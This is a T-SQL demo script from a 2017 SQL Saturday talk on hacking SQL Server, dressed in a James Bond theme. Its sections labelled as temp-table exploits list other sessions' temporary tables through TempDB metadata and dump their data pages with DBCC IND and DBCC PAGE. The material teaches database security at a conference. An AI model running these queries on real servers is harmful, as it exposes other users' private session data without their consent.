﻿/* 
    SQL Saturday #657 Göteborg 2017
    Hacking SQL Server
    2017-09-23 (version 1.34)
    Demo - Hacking Temporary Tables
    André Melancia
    http://Andy.PT

    (C) 2016-2017, André Melancia

           ________   ________    _________  ____________;_
          - ______ \ - ______ \ / _____   //.  .  ._______/
         / /     / // /     / //_/     / // ___   /
        / /     / // /     / /       .-'//_/|_/,-'
       / /     / // /     / /     .-'.-'
      / /     / // /     / /     / /
     / /     / // /     / /     / /
    / /_____/ // /_____/ /     / /
    \________- \________-     /_/

*/


--  +----------------------------------------------------------------+
--  | MISSION BRIEFING                                               |
--  +----------------------------------------------------------------+

    -- WARNING: Run these scripts on an EMPTY database!

    -- INSTRUCTIONS: Run one statement at a time.
    

--  +----------------------------------------------------------------+
--  | MISSION PREPARATION                                            |
--  +----------------------------------------------------------------+

    USE SQLSatGoteborg;     -- Or whatever database you created!
                            -- Please don't run this on the Master, that's
                            -- just ugly!
    GO

    -- Things an MI6 agent with Licence to KILL has to do
    -- Note: "IF EXISTS" are ugly. First time these will generate errors
    --       Just accept the errors as part of an agent's life ;)
    DROP USER M;
    DROP USER Q;
    DROP USER Sean;
    DROP USER David;
    DROP USER George;
    DROP USER Roger;
    DROP USER Timothy;
    DROP USER Pierce;
    DROP USER Daniel;
    GO
    
    DROP SECURITY POLICY AgentValidationPolicy
    GO
    DROP FUNCTION MI6_Access.FN_MI6_AgentValidationPredicate;
    GO
    DROP SCHEMA   MI6_Access;
    GO

    DROP VIEW     dbo.VIEW_BondFilms;
    GO
    DROP TABLE    dbo.BondFilms;
    GO
    DROP TABLE    dbo.Agents;
    GO
    DROP TABLE    dbo.Letters;
    GO


--  +----------------------------------------------------------------+
--  | CREATE USERS                                                   |
--  +----------------------------------------------------------------+

    CREATE USER M       WITHOUT LOGIN;
    CREATE USER Q       WITHOUT LOGIN;
    CREATE USER Sean    WITHOUT LOGIN;
    CREATE USER David   WITHOUT LOGIN;
    CREATE USER George  WITHOUT LOGIN;
    CREATE USER Roger   WITHOUT LOGIN;
    CREATE USER Timothy WITHOUT LOGIN;
    CREATE USER Pierce  WITHOUT LOGIN;
    CREATE USER Daniel  WITHOUT LOGIN;
   

--  +----------------------------------------------------------------+
--  | CREATE TABLE dbo.BondFilms                                     |
--  +----------------------------------------------------------------+

    CREATE TABLE dbo.BondFilms
    (
        FilmID       INT           NOT NULL,
        FilmTitle_EN NVARCHAR(64)  NOT NULL,
        FilmTitle_SV NVARCHAR(64)  NOT NULL,
        FilmYear     INT           NOT NULL, 
        BondActor    NVARCHAR(64)  NOT NULL,
        Agent        SYSNAME       NOT NULL,
		Payment      INT           NOT NULL,
        CONSTRAINT PK_BondFilms PRIMARY KEY CLUSTERED  ( FilmID ASC ) 
    );


    -- Insert some REAL top secret for-your-eyes-only information
    -- Leaked from here: https://en.wikipedia.org/wiki/List_of_James_Bond_films
    -- And fom here:     https://no.wikipedia.org/wiki/James_Bond
	INSERT INTO dbo.BondFilms
    (FilmID, FilmTitle_EN, FilmTitle_SV, FilmYear, BondActor, Agent, Payment) 
    VALUES 
    ( 1, 'Dr.No',                            'Agent 007 med rätt att döda',       1962, 'Sean Connery',   'Sean',      10000),
    ( 2, 'From Russia with Love',            'Agent 007 ser rött',                1963, 'Sean Connery',   'Sean',      10000),
    ( 3, 'Goldfinger',                       'Goldfinger',                        1964, 'Sean Connery',   'Sean',      10000),
    ( 4, 'Thunderball',                      'Åskbollen',                         1965, 'Sean Connery',   'Sean',      10000),
    ( 5, 'Casino Royale',                    'Casino Royale',                     1967, 'David Niven',    'David',     10000),
    ( 6, 'You Only Live Twice',              'Man lever bara två gånger',         1967, 'Sean Connery',   'Sean',      10000),
    ( 7, 'On Her Majesty''s Secret Service', 'I hennes majestäts hemliga tjänst', 1969, 'George Lazenby', 'George',    10000),
    ( 8, 'Diamonds Are Forever',             'Diamantfeber',                      1971, 'Sean Connery',   'Sean',      10000),
    ( 9, 'Live and Let Die',                 'Leva och låta dö',                  1973, 'Roger Moore',    'Roger',     10000),
    (10, 'The Man with the Golden Gun',      'Mannen med den gyllene pistolen',   1974, 'Roger Moore',    'Roger',     10000),
    (11, 'The Spy Who Loved Me',             'Älskade spion',                     1977, 'Roger Moore',    'Roger',     10000),
    (12, 'Moonraker',                        'Moonraker',                         1979, 'Roger Moore',    'Roger',     10000),
    (13, 'For Your Eyes Only',               'Ur dödlig synvinkel',               1981, 'Roger Moore',    'Roger',     10000),
    (14, 'Octopussy',                        'Octopussy',                         1983, 'Roger Moore',    'Roger',     10000),
    (15, 'Never Say Never Again',            'Never Say Never Again',             1983, 'Sean Connery',   'Sean',    3552822), /* 3552822 = 0x363636 = "36 36 36 00" little endian */
    (16, 'A View to a Kill',                 'Levande måltavla',                  1985, 'Roger Moore',    'Roger',     10000),
    (17, 'The Living Daylights',             'I skuddlinjen',                     1987, 'Timothy Dalton', 'Timothy',   10000),
    (18, 'Licence to Kill',                  'Iskallt uppdrag',                   1989, 'Timothy Dalton', 'Timothy',   10000),
    (19, 'GoldenEye',                        'GoldenEye',                         1995, 'Pierce Brosnan', 'Pierce',    10000),
    (20, 'Tomorrow Never Dies',              'Tomorrow Never Dies',               1997, 'Pierce Brosnan', 'Pierce',    10000),
    (21, 'The World Is Not Enough',          'Världen räcker inte till',          1999, 'Pierce Brosnan', 'Pierce',    10000),
    (22, 'Die Another Day',                  'Die Another Day',                   2002, 'Pierce Brosnan', 'Pierce',    10000),
    (23, 'Casino Royale',                    'Casino Royale',                     2006, 'Daniel Craig',   'Daniel',  3552822), /* 3552822 = 0x363636 = "36 36 36 00" little endian */
    (24, 'Quantum of Solace',                'Quantum of Solace',                 2008, 'Daniel Craig',   'Daniel',    10000),
    (25, 'Skyfall',                          'Skyfall',                           2012, 'Daniel Craig',   'Daniel',    10000),
    (26, 'Spectre',                          'Spectre',                           2015, 'Daniel Craig',   'Daniel',    10000);


    -- Super advanced top secret spying technique
    SELECT * FROM dbo.BondFilms;

    GO


--  +----------------------------------------------------------------+
--  | Thank you, Mr.Bond!                                            |
--  +----------------------------------------------------------------+

    -- Special thanks to 
    --     Miguel Oliveira
    --     https://www.linkedin.com/in/miguel-oliveira-96a7716/

    -- See also
	--     Paul White's article
	--     http://sqlblog.com/blogs/paul_white/archive/2010/08/14/viewing-another-session-s-temporary-table.aspx
	--     Paul Randal's info on DBCC IND and DBCC PAGE
	--     https://www.sqlskills.com/blogs/paul/inside-the-storage-engine-using-dbcc-page-and-dbcc-ind-to-find-out-if-page-splits-ever-roll-back/


--  +----------------------------------------------------------------+
--  | Top secret TempDB work                                         |
--  +----------------------------------------------------------------+

    GRANT SELECT ON dbo.BondFilms TO Public;


	-- Create a temp table as Sean and Roger 
	-- (use different connections)
	-- START
	EXECUTE AS USER = 'Sean';
    
	SELECT *, CURRENT_USER AS TempTableUser
	INTO #HackTable
	FROM dbo.BondFilms;

	SELECT *, CURRENT_USER AS SelectUser FROM #HackTable;

    REVERT; -- Go back to connection default user
    -- END

	-- Now as DBO...
	SELECT *, CURRENT_USER AS SelectUser FROM #HackTable; -- FAIL!

    -- In case an agent on the field needs to kill something...
	-- DROP TABLE #HackTable	


--  +-------------------------------------------------------------+
--  | TEMPDB TEMP TABLE EXPLOITS - METADATA                       |
--  +-------------------------------------------------------------+

	EXECUTE AS USER = 'Q';

	-- Get all tables names and some info
	SELECT * 
	FROM   TempDB.Sys.SysObjects
	WHERE  xtype  =    'U' 
	   AND [name] LIKE '%Hack%';


	-- Get number of records on those tables
	SELECT * 
	FROM   TempDB.Sys.Partitions
	WHERE  [object_id] IN (	SELECT id 
							FROM   TempDB.Sys.SysObjects
							WHERE  xtype  =    'U' 
							   AND [name] LIKE '%Hack%'
					      );


	-- Get columns in those tables
	SELECT * 
	FROM   TempDB.Sys.All_Columns
	WHERE  [object_id] IN (	SELECT id 
							FROM   TempDB.Sys.SysObjects
							WHERE  xtype  =    'U' 
							   AND [name] LIKE '%Hack%'
					      );

	REVERT; 

	
--  +-------------------------------------------------------------+
--  | TEMPDB TEMP TABLE EXPLOITS - DATA!                          |
--  +-------------------------------------------------------------+
	

	REVERT; 

	
	-- Mission preparation
	DROP TABLE IF EXISTS #StorageInfo;

	CREATE TABLE #StorageInfo
	(
		PageFID         BIGINT        NULL,
		PagePID         BIGINT        NULL,
		IAMFID          BIGINT        NULL,
		IAMPID          BIGINT        NULL,
		ObjectID        BIGINT        NULL,
		IndexID         BIGINT        NULL,
		PartitionNumber BIGINT        NULL,
		PartitionID     BIGINT        NULL,
		iam_chain_type  NVARCHAR(MAX) NULL,
		PageType        BIGINT        NULL,
		IndexLevel      BIGINT        NULL,
		NextPageFID     BIGINT        NULL,
		NextPagePID     BIGINT        NULL,
		PrevPageFID     BIGINT        NULL,
		PrevPagePID     BIGINT        NULL
    );
	

	-- Mission GO!
	
	DECLARE @ID INT;
	SET @ID = (	SELECT TOP (1) id 
				FROM   TempDB.Sys.SysObjects
				WHERE  xtype  =    'U' 
			       AND [name] LIKE '%Hack%'
			  );
	SELECT 'Table ID is...', @ID; -- One of the temp table's ID
	                              -- Remember that the TOP (1) only selected one!
	

	-- Get storage location into a table 
	INSERT INTO #StorageInfo
	EXEC ('DBCC IND(''TEMPDB'', ' + @ID + ', -1) WITH TABLERESULTS');

	SELECT * FROM #StorageInfo; -- Show it
	

	-- Top secret tool Q developed.
	DBCC TRACEON (3604);


	-- Get data!
	DECLARE @PageFID BIGINT;
	DECLARE @PagePID BIGINT;
	DECLARE cur CURSOR FOR  SELECT PageFID, 
	                               PagePID 
	                        FROM   #StorageInfo;

    OPEN cur;   
	FETCH NEXT FROM cur INTO @PageFID, @PagePID;  

	WHILE @@FETCH_STATUS = 0   
	BEGIN   
		   DBCC PAGE (TEMPDB, @PageFID, @PagePID, 3) WITH TABLERESULTS;

		   FETCH NEXT FROM cur INTO @PageFID, @PagePID   
	END   

	CLOSE cur;
	DEALLOCATE cur;
	 


--  +----------------------------------------------------------------+
--  | Mission is now over.                                           |
--  | You can't run away with the Bond Girl because you're an NSA    |
--  | agent, not an MI6 agent.                                       |
--  | Consider changing sides: MI6 has better... eh... cars...       |
--  +----------------------------------------------------------------+
